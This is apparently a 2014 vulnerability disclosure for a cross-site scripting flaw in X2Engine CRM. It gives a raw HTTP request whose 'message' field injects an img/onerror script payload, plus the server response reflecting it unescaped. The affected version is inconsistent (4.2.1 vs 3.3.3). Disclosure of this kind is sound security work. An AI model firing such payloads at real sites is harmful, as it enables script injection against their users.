#Affected Vendor: http://www.x2engine.com/
#Date: 24/09/2014
#Discovered by: JoeV
#Type of vulnerability: XSS
#Tested on: Windows 7
#Version : 4.2.1
#Description: X2Engine CRM v 3.3.3 is susceptible to Cross Site Scripting
attack.
Proof of Concept (PoC):
---------------------------
POST /index-test.php/site/motd HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 63
Accept: */*
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/37.0.2062.120 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/index-test.php/profile/1
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: iconSize=16x16; hudson_auto_refresh=true;
/modules/system/admin.php_SystemAutotasks_sortsel=sat_name;
/modules/system/admin.php_SystemAutotasks_ordersel=ASC;
/modules/system/admin.php_limitsel=15;
/modules/system/admin.php_SystemAutotasks_filtersel=default; cookies_on=1;
__atuvc=2%7C39; PHPSESSID=6mefdfmcnj13282kb7anr4obe2
message=%22%3E%3Cimg+src%3Dd+onerror%3Dconfirm(%2Fxss%2F)%3B%3E
HTTP/1.1 200 OK
Date: Wed, 24 Sep 2014 14:00:57 GMT
Server: Apache/2.4.9 (Win32) PHP/5.5.12
X-Powered-By: PHP/5.5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 37
Content-Type: text/html
"><img src=d onerror=confirm(/xss/);>
--
Regards,
*Joel V*